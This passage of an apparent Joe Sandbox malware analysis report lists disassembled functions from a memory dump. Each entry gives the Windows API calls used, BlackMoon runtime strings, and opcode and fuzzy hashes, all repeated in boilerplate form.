                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aae5679873c5506e551f42af981098a87ccbddb65a292451e118bf4b269d162b
                                                                • Instruction ID: c9f7f737d74bd1c6d358f6228013bd7c8666acdc836df72276170e41e22e3c28
                                                                • Opcode Fuzzy Hash: aae5679873c5506e551f42af981098a87ccbddb65a292451e118bf4b269d162b
                                                                • Instruction Fuzzy Hash: 44F05E74D00308FBDB10AFA1DC06BADBB39AB05304F1090AAF5043A291D6BA4A609F89
                                                                Function 004C26C6 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fe81dedbfcd2174f6154b5b6fd8dae5e5a8dad72efc98798b60def56f5890e7
                                                                • Instruction ID: e500985746a9fe3ca70c4d0cd506a391274b7707470178f656c54414a42306b8
                                                                • Opcode Fuzzy Hash: 9fe81dedbfcd2174f6154b5b6fd8dae5e5a8dad72efc98798b60def56f5890e7
                                                                • Instruction Fuzzy Hash: 14E0D879E41308A3E7109F50DE4BF2AB3789711711F04406AFD0467280E5B5EA2495AB
                                                                Function 00442196 Relevance: .0, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d66510b206ec2416981273afcf70c09afb7c1fb8e13a807ed660e913d836717c
                                                                • Instruction ID: bac935a9c5eb7da8e07ff5bb85c70e6b9ee1fbbc89105cce866c1b972069e4f4
                                                                • Opcode Fuzzy Hash: d66510b206ec2416981273afcf70c09afb7c1fb8e13a807ed660e913d836717c
                                                                • Instruction Fuzzy Hash: 45E08C34D0420CB7D7006E50DE06B6DBB39AB06311F809016BE043A190E6B65A35AB9A
                                                                Function 004743D1 Relevance: .0, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d1a507b683d1118576883746d5a459159f13c1a8f56beba4b5ca9e710f79f979
                                                                • Instruction ID: c8f33695b5a87f5872326ded8e0a488a61eb4946b9b9918bd28658611c9fc565
                                                                • Opcode Fuzzy Hash: d1a507b683d1118576883746d5a459159f13c1a8f56beba4b5ca9e710f79f979
                                                                • Instruction Fuzzy Hash: 8CD05E74A05248DBC711DF88C200768B7B4EB01300F2040E0D90957301D3746E009645
                                                                Function 0042E560 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,006A9C88,00000104), ref: 0042E5DE
                                                                • __ftol.LIBCMT ref: 0042E72E
                                                                • GetCommandLineA.KERNEL32 ref: 0042E754
                                                                • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042E7C1
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0042E7F3
                                                                • TranslateMessage.USER32(?), ref: 0042E7FA
                                                                • DispatchMessageA.USER32(?), ref: 0042E801
                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042E810
                                                                • wsprintfA.USER32 ref: 0042EA53
                                                                • MessageBoxA.USER32(00000000,?,blackmoon,00000010), ref: 0042EA6A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate__ftolwsprintf
                                                                • String ID: BlackMoon RunTime Error:%s$ERROR$blackmoon
                                                                • API String ID: 2186951270-532175377
                                                                • Opcode ID: 4f24574583d3adc933dd12c285e35e8bacf5df187271773de9a23c6789fac387
                                                                • Instruction ID: 293538c6dadbe7963358de68bd32b884ea8d35a61c1b05468d2fd594fe02bea9
                                                                • Opcode Fuzzy Hash: 4f24574583d3adc933dd12c285e35e8bacf5df187271773de9a23c6789fac387
                                                                • Instruction Fuzzy Hash: 82C1363378451446E324E669FC81BFFB781E7D1332F94053BEA05CA2D0D86F9909CA6A
                                                                Function 004CE770 Relevance: 22.7, APIs: 15, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantClear.OLEAUT32(?), ref: 004CE78A
                                                                • VariantInit.OLEAUT32(?), ref: 004CE791
                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 004CE7D2
                                                                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 004CE7EC
                                                                • SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 004CE7F9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$BoundVariant$ClearInit
                                                                • String ID:
                                                                • API String ID: 3354131989-0
                                                                • Opcode ID: c82c5b56e127194de1485bf7b56ea60036703373f7be35a9e4f34284765439f2
                                                                • Instruction ID: c91ac82dd30458459fe3d8399b3380468369ff41e9e82e541b862c4b0cf96d75
                                                                • Opcode Fuzzy Hash: c82c5b56e127194de1485bf7b56ea60036703373f7be35a9e4f34284765439f2
                                                                • Instruction Fuzzy Hash: 547191BA6083449FD344DF6AD88496BB7E9FFC8324F44492EF889C7210E739D9098B55
                                                                Function 0042AD00 Relevance: 22.7, APIs: 15, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantClear.OLEAUT32(?), ref: 0042AD1A
                                                                • VariantInit.OLEAUT32(?), ref: 0042AD21
                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 0042AD62
                                                                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 0042AD7C
                                                                • SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 0042AD89
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$BoundVariant$ClearInit
                                                                • String ID:
                                                                • API String ID: 3354131989-0
                                                                • Opcode ID: 702529b4935648623135f13163b348283d5b88ba391659994ae87d2da4aad167
                                                                • Instruction ID: cf97423ae663a66b0eaa756a5415e7036394d20cb83c9b97a5b86340537d32b4
                                                                • Opcode Fuzzy Hash: 702529b4935648623135f13163b348283d5b88ba391659994ae87d2da4aad167
                                                                • Instruction Fuzzy Hash: 5961F2726083559BC300DF65EC849ABF7E8FBC8325F84482EFD44C6210E739D9098BA6
                                                                Function 004DE52D Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 100fileCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004DE2E0), ref: 004DE59A
                                                                • GetStdHandle.KERNEL32(000000F4,004EA8FC,00000000,00000000,00000000,004DE2E0), ref: 004DE670
                                                                • WriteFile.KERNEL32(00000000), ref: 004DE677
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$HandleModuleNameWrite
                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $Xij$ij
                                                                • API String ID: 3784150691-327600375
                                                                • Opcode ID: 600661cb0ffbd6a33923be722bd2eb9ba801d3c247ab3288e0621749d95ca6b4
                                                                • Instruction ID: a5f026f0d9a935fd8cf7686c740ba97c963296b41d7d8075ef06ae9c4775ae3b
                                                                • Opcode Fuzzy Hash: 600661cb0ffbd6a33923be722bd2eb9ba801d3c247ab3288e0621749d95ca6b4
                                                                • Instruction Fuzzy Hash: 85313B72600258AFDF10F7A2DC46FDA376DEF82345F54085BF540DA241E678EA44CB2A
                                                                Function 0042EAF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113librarywindowloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(?), ref: 0042EB02
                                                                • LoadLibraryA.KERNEL32(?), ref: 0042EB0F
                                                                • wsprintfA.USER32 ref: 0042EB26
                                                                • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 0042EB3C
                                                                  • Part of subcall function 00429D10: ExitProcess.KERNEL32 ref: 00429D25
                                                                • GetProcAddress.KERNEL32(00000000,00000040), ref: 0042EBD1
                                                                • wsprintfA.USER32 ref: 0042EBE9
                                                                • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 0042EBFF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcess
                                                                • String ID: DLL ERROR
                                                                • API String ID: 1172160414-4092134112
                                                                • Opcode ID: 221ac441efe6667022ee75c6cb58662b397017cdb86f809399458931576f0568
                                                                • Instruction ID: 982f2e9db16c3ffd4728f1e1469edc06c825a5c4cc6ba52fd089536732514696
                                                                • Opcode Fuzzy Hash: 221ac441efe6667022ee75c6cb58662b397017cdb86f809399458931576f0568
                                                                • Instruction Fuzzy Hash: 2A3127B27043555FD320DF25AC85B5BBB98EB84714F40492AFB0697242EB78A809C7AD
                                                                Function 004E484F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,004DE651,?,Microsoft Visual C++ Runtime Library,00012010,?,004EA8FC,?,004EA94C,?,?,?,Runtime Error!Program: ), ref: 004E4861
                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004E4879
                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004E488A
                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004E4897
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad
                                                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                • API String ID: 2238633743-4044615076
                                                                • Opcode ID: 52491bf5373f9b551283c80453ca4401a279df1d94c98eed83935aedbd0d63e9
                                                                • Instruction ID: 058d0ad15094c119a8e50aff4c9d36bab79b1276b53c0703471523d40a59b2d6
                                                                • Opcode Fuzzy Hash: 52491bf5373f9b551283c80453ca4401a279df1d94c98eed83935aedbd0d63e9
                                                                • Instruction Fuzzy Hash: 4A01B1756003D1EF9711AFB69CC4D673BEABB85B42714153BB201C2260DB3C9851CB39
                                                                Function 0042CDA0 Relevance: 13.7, APIs: 9, Instructions: 186comregistryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadTypeLib.OLEAUT32(00000000,?), ref: 0042CE08
                                                                • GetUserDefaultLCID.KERNEL32(00000000,?,0000091C,00000000,00000000,00010030,Adodb.Stream,00000000,80000004,00000000,00000000,00000000), ref: 0042CE17
                                                                • LHashValOfNameSys.OLEAUT32(00000001,00000000), ref: 0042CE20
                                                                • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0042CE86
                                                                • CLSIDFromProgID.COMBASE(00000000,?), ref: 0042CEC7
                                                                • CLSIDFromString.COMBASE(00000000,?), ref: 0042CEDA
                                                                • CoCreateInstance.COMBASE(?,00000000,00000017,004EA5F0,?), ref: 0042CF15
                                                                • CoCreateInstance.COMBASE(?,00000000,00000007,004EA5F0,?), ref: 0042CF33
                                                                • OleRun.OLE32(?), ref: 0042CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFromInstanceType$DefaultHashLoadNameProgRegisterStringUser
                                                                • String ID:
                                                                • API String ID: 458303785-0
                                                                • Opcode ID: bbf10cfc526b89318b59cb90c08e93cdaf915e3ce7c049e67a6979c19d307fe3
                                                                • Instruction ID: 10d79731ac223f1b8c26979441e355dd4191d18913a1c279e56b4dfe62169c86
                                                                • Opcode Fuzzy Hash: bbf10cfc526b89318b59cb90c08e93cdaf915e3ce7c049e67a6979c19d307fe3
                                                                • Instruction Fuzzy Hash: 8F517DB1604315AFC210DF65ECC496FB7E8EB88714F41492EF549C7201E739E9498BAA
                                                                Function 0042A590 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 0042A5CA
                                                                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 0042A5E6
                                                                • SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 0042A5F3
                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 0042A64A
                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0042A683
                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 0042A6B6
                                                                • SafeArrayGetElemsize.OLEAUT32(00000000), ref: 0042A6CA
                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0042A6EE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
